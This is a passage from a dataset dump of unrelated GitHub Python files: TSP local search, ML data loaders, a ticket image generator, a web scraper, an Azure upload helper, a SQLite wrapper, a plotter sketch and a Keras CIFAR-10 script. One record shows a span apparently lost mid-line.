\nprint(answer_string)\nprint(alphabet)\n","repo_name":"woodgern/AdventOfCode2018","sub_path":"aoc-7-1.py","file_name":"aoc-7-1.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73819813286","text":"import pandas as pd\nimport os\nimport numpy as np\n\n# Create dummy csv files for training and validation set containing images and corresponding labels\n\ndata_path = \"data\"\n\nif \"train_patches.csv\" not in os.listdir(\"data\") and \"valid_patches.csv\" not in os.listdir(\"data\"):\n # make a list of all images\n img_list = os.listdir(data_path)\n train_img_list = img_list[:8]\n valid_img_list = img_list[8:]\n for img_list, split in zip([train_img_list, valid_img_list], [\"train\", \"valid\"]):\n # add placeholder labels for demo purposes\n label_list = [0]*len(img_list)\n\n patches = pd.DataFrame({\"imgs\":img_list, \"labels\":label_list})\n csv_path = os.path.join(data_path, f\"{split}_patches.csv\")\n patches.to_csv(csv_path, index=False)\nelse:\n print(\"Training or validation csv files already created.\")","repo_name":"blazejdolicki/pytorch-templates","sub_path":"vision/create_data_filelist.py","file_name":"create_data_filelist.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2324521657","text":"from typing import Tuple\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor\n\nclass FashionMNISTData:\n\n def __init__(self) -> None:\n train_data, test_data = self.__fetch_data()\n batch_size = 64\n\n self.train_dataloader = DataLoader(train_data, batch_size=batch_size)\n self.test_dataloader = DataLoader(test_data, batch_size=batch_size)\n\n def get_data(self) -> Tuple[object, object]:\n return (self.train_dataloader, self.test_dataloader)\n \n def print_data_shape(self) -> None:\n for X, y in self.test_dataloader:\n print(f\"Shape of X [N, C, H, W]: {X.shape}\")\n print(f\"Shape of y: {y.shape} {y.dtype}\\n\")\n break\n \n def __fetch_data(self) -> Tuple[object, object]:\n train_data = datasets.FashionMNIST(root='data',\n train=True,\n download=True,\n transform=ToTensor(),\n )\n test_data = datasets.FashionMNIST(root='data',\n train=False,\n download=True,\n transform=ToTensor(),\n )\n return (train_data, test_data)\n ","repo_name":"ccentrella/pytorch","sub_path":"model/FashionMNISTData.py","file_name":"FashionMNISTData.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12643256842","text":"from AOA_TSP_greedy import read_datas, compute_dis_mat, ramdom_start,compute_total_dist\nfrom AOA_TSP_greedy_VP import read_datas2, compute_dis_mat2, ramdom_start2\nfrom AOA_TSP_greedy import greedy as greedy1\nfrom AOA_TSP_greedy_VP import greedy2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nimport openpyxl\nimport pandas as pd\nimport os\n\n#initial\ndef initial1():\n path = r\"Problem I-TSP_100Cities.xlsx\"\n location = read_datas(path) # 2 x num_city\n dist_mat = compute_dis_mat(location)\n length,start,order,_ = ramdom_start(location)\n return location, dist_mat,length,start,order\n\ndef initial2():\n filename = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n location = read_datas2(r\"Problem I-TSP_100Cities.xlsx\")\n dist_mat = compute_dis_mat2(read_datas2(filename)) #different from 1\n length, start, order, _ = ramdom_start2(filename,location)\n return location, dist_mat, length, start, order\n\n\ndef TSP_plt(location,order):\n X_locations = [location[i][0] for i in order]\n Y_locations = [location[i][1] for i in order]\n\n plt.scatter(X_locations, Y_locations, color='b')\n plt.plot(X_locations, Y_locations, \"->\", color='g')\n plt.scatter(X_locations[0], Y_locations[0], color='r')\n plt.show()\n return\n\n\n\ndef get_edge_and_evaluate(order,dist_mat,length):\n get_new = False\n evaluate_iter = 0\n new_order = []\n length_change = 0\n new_order = order\n new_length = length\n while get_new == False:\n end1,end2 = random.sample(order,2)\n n_inverse = abs(end1-end2)\n if n_inverse ==1:\n continue\n\n evaluate_iter +=1\n if evaluate_iter > 6000:\n break\n\n\n x1=min(end1,end2)\n x2=max(end1,end2)\n\n edge1 = [x1-1,x1]\n edge2 = [x2,x2+1]\n if x1 == 0:\n edge1[0] = len(order)-1\n if x2 == len(order)-1:\n edge2[1]=0\n\n #edge1[0]-edge1[1]-edge2[0]-edge2[1] index in order[]\n #x10--x11--x20--x21\n x10,x11 = order[edge1[0]],order[edge1[1]]\n x20,x21 = order[edge2[0]],order[edge2[1]]\n length_minor = dist_mat[x10][x11] + dist_mat[x20][x21]\n length_add = dist_mat[x10][x20] + dist_mat[x11][x21]\n\n length_change = length_add - length_minor\n\n\n if length_change < 0:\n # revise i2--j1\n\n if edge1[1] == 0:\n list1=[]\n else:\n list1 = order[:edge1[1]]\n\n reverse_list = order[edge1[1]:edge2[0] + 1]\n reverse_list.reverse()\n\n if edge2[0] == 0:\n list3 =[]\n else:\n list3 = order[edge2[0]+1:]\n\n new_order = list1 + reverse_list + list3\n new_length = length+length_change\n get_new = True\n\n\n # else:\n # length_change=0\n # new_order = order\n # new_length = length\n\n return length_change, new_order, new_length, evaluate_iter\n\n\n\n\ndef pltshow(location,order,version):\n order = order + [order[0]]\n X_locations = [location[i][0] for i in order]\n Y_locations = [location[i][1] for i in order]\n\n plt.scatter(X_locations, Y_locations, color='b')\n plt.plot(X_locations, Y_locations, \"->\", color='g')\n plt.scatter(X_locations[0], Y_locations[0], color='r')\n plt.title(version)\n plt.show()\n\n\n\ndef local_search1(order,location, length,dist_mat,start_time):\n evaluate_total = 0\n for_stop = 0\n while evaluate_total < 100000:\n evaluate_total +=1\n\n evaluate_result = get_edge_and_evaluate(order,dist_mat,length)\n\n if evaluate_result is not None:\n length_change,new_order, new_length, evaluate_iter = evaluate_result\n\n evaluate_total += evaluate_iter\n # print(\"length_change\", new_length-length)\n # print(\"evaluate_time\", evaluate_total)\n # print(\"time is \", time.time() - start_time)\n print(\"cureent_compute\", evaluate_total)\n print(\"current_best_length\", new_length)\n print(\"best_order\", new_order)\n\n if new_length - length ==0:\n for_stop += 1\n if for_stop >3:\n break\n\n # pltshow(location, order)\n\n else:\n new_order = order\n new_length = length\n\n order = new_order\n length = new_length\n\n compute_time = time.time()-start_time\n # pltshow(location, order,version)\n\n print(\"No better tour is obtained by local search\")\n\n return order, length, evaluate_total,compute_time\n\ndef list2str(input):\n \"\"\"\n input: 1xm list or np.array\n output: str item0——>item1——> ...——>item -1\n \"\"\"\n input = list(input)\n input = [str(i) for i in input]\n output = \" \".join(input)\n return output\n\ndef str2list(input):\n\n # input = str.replace(input,\"——>\",\",\")\n input = input.split(\" \")\n output = [int(i) for i in input]\n # output = np.array(input)\n return output\n\n\ndef save_csv(save_name,version:str,data,names=None,mode=\"w\",header=False):\n # import pdb\n # pdb.set_trace()\n\n if names is None:\n names=[\"version\",\"length\",\"tour\",\"single_compute\",\"single_time\",\"total_compute\",\"total_time\"]\n else:\n names = names\n csv_data = []\n data.insert(0,version)\n csv_data.append(data)\n csv_pd = pd.DataFrame(csv_data,columns=names)\n csv_pd.to_csv(save_name,sep=',',mode=mode, header=header,index=False)\n\ndef LocalSearch_MultiIntial(filename,save_name,n=100,problem=1):\n evaluate_total = 0\n compute_time = 0\n for i in range(n):\n start = i\n\n if problem == 1:\n location = read_datas(filename)\n dist_mat = compute_dis_mat(location)\n init_length,init_order, = greedy1(start,location)\n else:\n location = read_datas2(filename)\n dist_mat = compute_dis_mat2(location)\n init_length,init_order = greedy2(start,filename)\n\n init_order.pop()\n start_time = time.time()\n order, length, evaluate_single,single_time = local_search1(init_order, location, init_length, dist_mat, start_time)\n version = \"Problem{}\".format(problem)+ \"_start_from_city{}\".format(start)\n tour = list2str(order)\n evaluate_total += evaluate_single\n compute_time += single_time\n data = [length,tour,evaluate_single,single_time,evaluate_total,compute_time]\n save_csv(save_name,version, data, mode='a')\n\n file_location = r\"Problem I-TSP_100Cities.xlsx\"\n plt_location =read_datas(file_location)\n pltshow(plt_location, order,version+\"with_length_\"+str(length))\n\ndef greedy_initial(filename,save_name,n=100,problem=1):\n for i in range(n):\n start = i\n\n if problem == 1:\n location = read_datas(filename)\n # dist_mat = compute_dis_mat(location)\n init_length, init_order, = greedy1(start, location)\n else:\n location = read_datas2(filename)\n # dist_mat = compute_dis_mat2(location)\n init_length, init_order = greedy2(start, filename)\n\n init_order.pop()\n version = \"Problem{}\".format(problem) + \"_start_from_city{}\".format(start)\n tour = list2str(init_order)\n data = [init_length, tour]\n names=[\"version\",\"length\",'tour']\n save_csv(save_name, version, data=data, names=names , mode='a')\n\ndef save_initials_from_greedy(problem=1):\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n\n save_name1 = \"greedy_initial_1.csv\"\n save_name2 = \"greedy_initial_2.csv\"\n greedy_initial(filename1, save_name1, n=100, problem=1)\n greedy_initial(filename2, save_name2, n=100, problem=2)\n\n\n\ndef experiment_1():\n \"\"\"\n strat from all cities to obtain 100 initial tours,\n then run local search for each initial solution\n \"\"\"\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n\n # LocalSearch_MultiIntial(filename1, n=100, problem=1)\n save_name = \"good_results_problem1_try3.csv\"\n LocalSearch_MultiIntial(filename1, save_name, n=100, problem=1)\n\ndef experiment_2(i=1,problem=1):\n \"\"\"\n strat from all cities and select 20% best solutions as initial solutions.\n then run local search for each initial solution\n \"\"\"\n\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n initial_file1 = \"greedy1_initial_20.csv\"\n initial_file2 = \"greedy2_initial_20.csv\"\n location =read_datas(filename1)\n\n\n if problem == 1:\n initial_file = initial_file1\n dist_mat = compute_dis_mat(read_datas(filename1))\n else:\n initial_file = initial_file2\n dist_mat = compute_dis_mat2(read_datas2(filename2))\n\n initial_solutions = pd.DataFrame(pd.read_csv(initial_file, header=None))\n evaluate_total = 0\n compute_time = 0\n lengths = dict()\n lengths[\"samll_lengthes\"] = []\n lengths[\"save_names\"] = []\n smallest_length = np.inf\n small_name=None\n for data in initial_solutions.values:\n version, init_length, tour = data\n init_order = str2list(tour)\n init_length = float(init_length)\n\n start_time = time.time()\n order, length, evaluate_single,single_time = local_search1(init_order, location, init_length, dist_mat, start_time)\n evaluate_total += evaluate_single\n compute_time += single_time\n\n order.pop()\n tour = list2str(order)\n data = [length, tour, evaluate_single,single_time,evaluate_total,compute_time]\n names=[\"version\",\"length\",\"tour\",\"single_compute\",\"single_time\",\"total_compute\",\"total_time\"]\n\n save_name = \"problem{}\".format(problem)+\"_20initial_try{}\".format(i)+\".csv\"\n save_name = os.path.join(\"result3\",save_name)\n save_csv(save_name=save_name,version=version, data=data, names=names, mode='a')\n\n if length dd/mm/yy hh:mm:ss\n \n price (float, optional): ticket price. Defaults to None.\n seat (str, optional): seat number. Defaults to None.\n location (str, optional): event location. Defaults to None.\n wallet (str, optional): wallet id. Defaults to None.\n \"\"\"\n \n # Ticket\n self.id = id\n self.url = url # qr code url\n self.price = price\n self.picture = picture # picture\n self.seat = seat\n \n # Event\n self.title = str(title).upper() # main title\n self.subtitle = str(subtitle).upper() # sub title\n self.location = location\n\n formatted_date = datetime.strptime(date, '%d/%m/%Y %H:%M:%S')\n self.day = formatted_date.strftime('%b %d %Y')\n self.hour = formatted_date.strftime('%I:%M%p')\n self.date = date # date\n self.wallet = wallet\n\n def generate_picture(self):\n \"\"\"generate ticket\n\n Returns:\n image at png format\n \"\"\"\n # Creating an instance of qrcode\n qr_code = QrCodeGenerator.generateQrCode(self.url).img\n qr_code = qr_code.resize((360, 360))\n\n # Background image\n background = Image.open('./ressources/template/background.png', 'r').convert('RGB') #Opens Template Image\n \n # Special picture\n special_picture = Image.open(self.picture,'r').convert('RGB')\n special_picture = special_picture.resize((630, 630))\n\n # Add special picture on the background \n background.paste(qr_code, (100, 238))\n background.paste(special_picture, (1947, 120))\n\n def addNewDraw(text: str, x_pos: str, y_pos: str, fontsize: str, fontcolor: tuple, fontwidth: int = 1):\n \"\"\"Add text on the picture\n\n Args:\n text (str): the text added on the picutre\n x_pos (str): text x position\n y_pos (str): text y position\n fontsize (str): text fontsize\n fontcolor (tuple): text fontcolor (r, g, b)\n fontwidth (int, optional): text fontwidth. Defaults to 1.\n \"\"\"\n draw = ImageDraw.Draw(background)\n myFont = ImageFont.truetype(\"./ressources/courrier_new.ttf\", fontsize)\n w, h = draw.textsize(text, font = myFont)\n draw.text((x_pos - (w/2), y_pos - (h/2)), text, font= myFont, stroke_width=fontwidth, fill=fontcolor)\n\n # Initialize color\n blue_color = (30, 61, 89)\n orange_color = (255, 193, 59)\n \n # Display title\n addNewDraw(self.title, 1220, 320, 120, blue_color, 3)\n \n # Display subtitle\n addNewDraw(self.subtitle, 1220, 500, 90, blue_color, 3)\n \n # Display day\n addNewDraw(self.day, 280, 190, 50, orange_color, 1)\n \n # Display hour\n addNewDraw(self.hour, 280, 635, 50, orange_color, 1)\n\n # Display no refund\n _text = \"No refund / No exchange\"\n addNewDraw(_text, 815, 815, 38, (245, 240, 225))\n \n # Display ID\n addNewDraw(\"N°\" + str(self.id), 280, 50, 25, orange_color, 1)\n \n # Display ID\n addNewDraw(\"Seat N°\" + str(self.seat), 280, 800, 30, orange_color, 1)\n \n return background\n\n\n # Create JSON\n def generate_json(self): \n data = {}\n data['event_date'] = self.date\n data['event_location'] = self.location\n data['event_title'] = self.title.lower()\n data['event_subtitle'] = self.subtitle.lower()\n \n data['ticket_seat'] = self.seat\n data['ticket_price'] = self.price\n data['ticket_id'] = self.id\n data['wallet'] = self.wallet\n \n return json.dumps(data)","repo_name":"Dimitri-Prieur/NFT-project","sub_path":"package/ticket_generator.py","file_name":"ticket_generator.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40736702147","text":"#!/usr/bin/env python3\nimport re, datetime\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup as BS\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors.\n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n\ndef main():\n print('begin')\n raw_html = simple_get('http://uscode.house.gov/download/download.shtml')\n html = BS(raw_html, 'html.parser')\n # print(html)\n updated = html.find('h3').text\n download = ''\n for a in html.find_all('a'):\n if a.text == '[XHTML]':\n download = a\n print(updated)\n print(download.text)\n # for h in html.find('h3'):\n # if h['class'] == 'releasepointinformation':\n # print(h.text)\n release = re.search(r'\\d{3}-\\d{3}', updated).group()\n print(release)\n\nif __name__=='__main__':\n main()\n","repo_name":"samlehman617/legal-vcs","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18770662579","text":"import os\nimport subprocess\n\n\nclass AzureStorage:\n\n\tdef __init__ (self, container, *,\n\t\taccount_name,\n\t\tsas_token\n\t):\n\t\tself._container = container\n\t\tself._account = account_name\n\t\tself._sas_token = sas_token\n\n\tdef upload (self, filename, blobname):\n\t\tsubprocess.run([ 'az', 'storage', 'blob', 'upload',\n\t\t\t'--container', self._container,\n\t\t\t'--file', filename,\n\t\t\t'--name', blobname\n\t\t],\n\t\t\tcapture_output = True,\n\t\t\tenv = {\n\t\t\t\t**os.environ,\n\t\t\t\t'AZURE_STORAGE_ACCOUNT': self._account,\n\t\t\t\t'AZURE_STORAGE_SAS_TOKEN': self._sas_token\n\t\t\t}\n\t\t)\n","repo_name":"bartan0/azure-debrepo","sub_path":"azure_debrepo/azure_storage.py","file_name":"azure_storage.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"528341408","text":"import sqlite3\nimport query as q\n\n\ndef row_factory(cursor, row):\n d = {}\n for i, col in enumerate(cursor.description):\n d[col[0]] = row[i]\n return d\n\n\ndef execute(table: str, data: dict) -> dict:\n\n response = {\n 'status': 'Ok',\n 'data': [],\n 'affectedRows': -1,\n 'insertId': 0\n }\n\n try:\n if 'action' not in data:\n raise Exception(\n 'An action has to be specified (insert|update|select|delete)'\n )\n\n action = data['action']\n cond = data['cond'] if 'cond' in data else {}\n order = data['order'] if 'order' in data else {}\n limit = data['limit'] if 'limit' in data else False\n offset = data['offset'] if 'offset' in data else 0\n page = (limit, offset) if limit is not False else False\n\n if 'data' not in data and action != 'delete':\n raise Exception('data field is required for this operation')\n\n fields = data['data'] if 'data' in data else {}\n\n if action == 'insert':\n query, values = q.insert(table, fields)\n elif action == 'update':\n query, values = q.update(table, fields, cond)\n elif action == 'select':\n query, values = q.select(table, fields, cond, order, page)\n elif action == 'delete':\n query, values = q.delete(table, cond)\n else:\n raise Exception(f'Unknown action {action}')\n\n conn = sqlite3.connect('data.db')\n conn.row_factory = row_factory\n c = conn.cursor()\n\n resp = c.execute(query, values)\n response['data'] = resp.fetchall()\n response['affectedRows'] = c.rowcount\n response['insertId'] = c.lastrowid\n\n conn.commit()\n conn.close()\n except BaseException as e:\n response['status'] = e.args[0]\n\n return response\n\n\nif __name__ == \"__main__\":\n import sys\n import json\n\n jsoninput = \"\".join(list(sys.stdin))\n data = json.loads(jsoninput)\n response = execute('people', data)\n jsonoutput = json.dumps(response)\n\n print(jsonoutput)\n","repo_name":"hbarrocas/miniserve","sub_path":"server/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4334244956","text":"\nimport csv\nimport jsonlines\nimport os\n\n\n\nclass JsonLineParser():\n write_file = open(\"method_data.csv\", 'a')\n csvwriter = csv.writer(write_file)\n csvwriter.writerow(['IMEI', 'COUNT'])\n list_of_imeis = []\n\n @classmethod\n def tearDownClass(cls):\n cls.write_file.close()\n\n @classmethod\n def directory_iterator(cls, file_path):\n \"\"\"\n :param file_path: Parent Directory where all the folders are\n :return:\n \"\"\"\n\n # Iterate through directory\n for folder in os.listdir(file_path):\n if folder != '.DS_Store':\n for subfolder in os.listdir(file_path + \"/\" + folder):\n if subfolder != '.DS_Store':\n for startdayfolder in os.listdir(file_path + \"/\" + folder + \"/\" + subfolder):\n if startdayfolder != '.DS_Store':\n for file in os.listdir(file_path + \"/\" + folder + \"/\" + subfolder + \"/\" + startdayfolder):\n cls.file_parser(file_path + \"/\" + folder + \"/\" + subfolder + \"/\" + startdayfolder + \"/\" + file)\n\n\n cls.print_csv(cls.list_of_imeis)\n\n\n @classmethod\n def file_parser(cls, path):\n \"\"\"\n :param path: input json file\n :return:\n \"\"\"\n input = path\n with jsonlines.open(input) as reader:\n # Iterate through json lines - compile list of offending IMEIs into one list\n for obj in reader:\n sensorAnomalies = obj[\"sensorAnomalies\"]\n\n for i in range(len(sensorAnomalies)):\n if len(sensorAnomalies[i][\"repeatingRpmAndSpeed\"]) != 0:\n temp_imei = obj['imei']\n # if temp_imei not in cls.list_of_imeis:\n cls.list_of_imeis.append(temp_imei)\n\n\n\n @classmethod\n def print_csv(cls, imeis):\n distinct = []\n for i in imeis:\n if i not in distinct:\n distinct.append(i)\n counter = cls.list_of_imeis.count(i)\n cls.csvwriter.writerow([i, counter])\n\n\n\n","repo_name":"fionasudihok/data_refine","sub_path":"data_parser.py","file_name":"data_parser.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10894834758","text":"from numpy.core.shape_base import block\nimport vsketch\nfrom shapely import geometry, affinity\nimport numpy as np\nimport random\nimport os\n\n# future ideas:\n# windows, doors, chimneys\n# perspective positioning/composition\n# curved parts\n\nnp.set_printoptions(suppress=True)\n\nclass Tower():\n \n def __init__(self, vsk, other) -> None:\n \n self.o = other\n \n self.vsk = vsk\n \n self.pos = np.array([[0,0]])\n\n \n self.block_types = np.array([\n [\"straight\", self.o.block_straight],\n [\"diagonal_in\", self.o.block_diagonal_in],\n [\"diagonal_out\", self.o.block_diagonal_out],\n [\"random_angle\", self.o.block_random_angle]\n ], dtype=object)\n \n\n\n def add_block(self):\n vsk = self.vsk\n \n block_type = random.choices(self.block_types[:,0], weights=self.block_types[:,1])[0]\n \n if block_type == \"straight\":\n self.pos = np.append(self.pos, \n [[self.pos[-1,0],\n self.pos[-1,1] -(vsk.random(self.o.block_height_rand) +self.o.block_height_min)]],\n axis=0)\n \n if block_type == \"diagonal_in\":\n displace = vsk.random(self.o.block_height_rand) + self.o.block_height_min\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] + displace,\n self.pos[-1,1] - displace]],\n axis=0)\n \n if block_type == \"diagonal_out\":\n displace = vsk.random(self.o.block_height_rand) + self.o.block_height_min\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] - displace,\n self.pos[-1,1] - displace]],\n axis=0)\n \n if block_type == \"random_angle\":\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] +vsk.random(self.o.block_angle_x_rand) +self.o.block_angle_x_min,\n self.pos[-1,1] -(vsk.random(self.o.block_height_rand) +self.o.block_height_min)]],\n axis=0)\n \n def add_top(self):\n vsk = self.vsk\n \n self.pos = np.append(\n self.pos, [[max(self.pos[:,0]) + vsk.random(self.o.top_w_rand) + self.o.top_w_min,\n self.pos[-1,1] - (vsk.random(self.o.top_h_rand) + self.o.top_h_min)]], axis=0)\n \n\n def draw_tower(self):\n vsk = self.vsk\n \n # vsk.geometry(geometry.LineString(self.pos))\n \n for i in range(self.o.line_count):\n \n scale = np.cos((np.pi/(self.o.line_count-1)) * i)\n \n scaled = affinity.scale(geometry.LineString(self.pos), scale)\n translated = affinity.translate(scaled, (max(self.pos[:,0]) - min(self.pos[:,0])) /2 * (1 - scale))\n centered = affinity.translate(translated, -(max(self.pos[:,0]) - min(self.pos[:,0])))\n \n vsk.geometry(centered)\n\n\nclass Day09ArchitectureSketch(vsketch.SketchClass):\n \n line_count = vsketch.Param(20)\n \n block_straight = vsketch.Param(5)\n block_diagonal_in = vsketch.Param(4)\n block_diagonal_out = vsketch.Param(4)\n block_random_angle = vsketch.Param(2)\n \n block_height_min = vsketch.Param(5)\n block_height_rand = vsketch.Param(2)\n \n block_angle_x_min = vsketch.Param(-3.5)\n block_angle_x_rand = vsketch.Param(7)\n \n block_count_min = vsketch.Param(10)\n block_count_max = vsketch.Param(15)\n \n top_h_min = vsketch.Param(5)\n top_h_rand = vsketch.Param(5)\n \n top_w_min = vsketch.Param(5)\n top_w_rand = vsketch.Param(5)\n\n\n def draw(self, vsk: vsketch.Vsketch) -> None:\n vsk.size(\"205mmx130mm\", landscape=False)\n vsk.scale(\"mm\")\n \n vsk.line(-19,0,178,0)\n \n for x in range(5):\n \n t = Tower(vsk, self)\n for i in range(int(vsk.random(self.block_count_min, self.block_count_max))):\n t.add_block()\n t.add_top()\n t.draw_tower()\n vsk.translate(39,0)\n\n # implement your sketch here\n # vsk.circle(0, 0, self.radius, mode=\"radius\")\n\n def finalize(self, vsk: vsketch.Vsketch) -> None:\n filename = os.path.basename(__file__)[7:-3]\n vsk.vpype(f\"rotate 180 linemerge linesimplify reloop linesort gwrite {filename}.gcode\")\n\n\nif __name__ == \"__main__\":\n Day09ArchitectureSketch.display()\n","repo_name":"hapiel/Genuary-2022","sub_path":"day09_architecture/sketch_day09_architecture.py","file_name":"sketch_day09_architecture.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"26604219563","text":"\"\"\"Setup logging environment\"\"\"\nimport logging\nimport logging.config\nimport re\n\n\nclass SecretWordFilter(logging.Filter):\n def __init__(self, param=None):\n self.param = param\n\n def filter(self, record):\n msg = str(record.msg)\n for x in self.param:\n if x in msg.lower():\n word_finder = re.compile(rf\"({x}':) (\\S+)'\", re.DOTALL | re.IGNORECASE)\n record.msg = re.sub(word_finder, r\"\\1 #redacted#\", msg)\n return True\n\n\nLOGGING = {\n \"version\": 1,\n \"formatters\": {\n \"detailed\": {\n \"class\": \"logging.Formatter\",\n \"format\": \"%(asctime)s %(name)-1s:%(levelname)-8s %(message)s\",\n }\n },\n \"filters\": {\n \"myfilter\": {\n \"()\": SecretWordFilter,\n \"param\": [\"password\", \"secret\", \"connurl\"],\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"filters\": [\"myfilter\"],\n \"formatter\": \"detailed\",\n }\n },\n \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n}\n\nlogging.config.dictConfig(LOGGING)\n# Setting the threshold of py4j.java_gateway to WARNING\n# To avoid spam in databricks logs\nlogging.getLogger(\"py4j.java_gateway\").setLevel(logging.WARNING)\n\n\ndef get_logger(name):\n return logging.getLogger(name)\n","repo_name":"husqvarnagroup/GETL","sub_path":"getl/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"10702217307","text":"from keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense,Activation,Dropout,Flatten\nfrom keras.layers.convolutional import Conv2D,MaxPooling2D\nfrom keras.optimizers import RMSprop,SGD,Adam\nimport matplotlib.pyplot as plt\n\n#CIFAR 10 has 60k imgages, 32x32 and RGB\n\nIMG_CHANNELS=3\nIMG_ROWS=32\nIMG_COLUMNS=32\n\n#constants\n\nBATCH = 128\nepoch=20\nclasses=10\nverbose=1\nvalidation=0.2\noptimiser=RMSprop()\n\n#LoadDataset\n\n(X_train,Y_train),(X_test,Y_test)=cifar10.load_data()\nprint(\"X_train size \",X_train.shape[0])\nprint(\"X_test size: \",X_test.shape[0])\n# print(\"No of features: \",Y_train.shape[1])\n\n#One hot encode\n\nY_train=np_utils.to_categorical(Y_train,classes)\nY_test=np_utils.to_categorical(Y_test,classes)\n\n# print(\"The class labels: \",Y_train[0])\n\n#Normalise the data\nX_train=X_train.astype('float32')\nX_test=X_test.astype('float32')\nX_train/=255\nX_test/=255\n\n#Creating the neural network\nmodel=Sequential()\nmodel.add(Conv2D(32,(3,3),strides=1,padding='same',input_shape=(IMG_ROWS,IMG_COLUMNS,IMG_CHANNELS)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(classes))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n#training the model\n\nmodel.compile(loss='categorical_crossentropy',optimizer=optimiser,metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=BATCH,epochs=epoch,validation_split=validation,verbose=1)\nscore=model.evaluate(X_test,Y_test,batch_size=BATCH,verbose=0)\n# print(\"Test accuracy: \",score[1])\n\nimport numpy as np\nimport cv2\n\nimgs=cv2.imread('dog.jpg')\nimgs=cv2.resize(imgs,(32,32))\n\n# model.predict_classes(imgs.reshape(1,32,32,3),batch_size=128,verbose=1)\nmodel.predict_proba(imgs.reshape(1,32,32,3),batch_size=10,verbose=1)\n","repo_name":"KatameRonin/ComputerVision","sub_path":"ImageClassification/CIFAR10/Img_cifar10.py","file_name":"Img_cifar10.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71323445606","text":"import pygame\n\nGROUND = \"\"\"\n #####\n # 2 #\n # #\n # 1 #\n #####\n\"\"\"\n# SETTING\nLOOP_SPEED = 0.01\nMAX_DELAY = 2\nMID_DELAY = 1\nMAX_TIMER = 200\nREPEAT_NB = 100\nLOAD_QTABLE = False\n\n# POSITION\nPLAYER_ONE_POSITION = '1'\nPLAYER_TWO_POSITION = '2'\nWALL = '#'\n\n# REWARDS\nREWARD_WIN = 100\nREWARD_LOSE = -100\nREWARD_BORDER = -10\nREWARD_NOTHING = -20\n\nREWARD_GET_HIT = -15\nREWARD_DIRECT_HIT = 10\n\nREWARD_INTERRUPT = 20\nREWARD_GET_INTERRUPT = -10\n\nREWARD_GET_HEAVY_HIT = -35\nREWARD_DIRECT_HEAVY_HIT = 30\n\nREWARD_BLOCKED_HIT = 10\nREWARD_GET_BREAK = -20\nREWARD_BREAK_BLOCK = 20\n\nRUN_IN_OPPONENT = -15\nREWARD_MOVE = -1\n\nREWARD_MISS = -40\nREWARD_HIT_IN_BLOCK = -10\n\n\n#ACTIONS\nLEFT = 'LEFT'\nRIGHT = 'RIGHT'\nUP = 'UP'\nDOWN = 'DOWN'\nATT_LEFT = 'ATT_LEFT'\nATT_RIGHT = 'ATT_RIGHT'\nHEAVY_ATT_LEFT = 'H_ATT_LEFT'\nHEAVY_ATT_RIGHT = 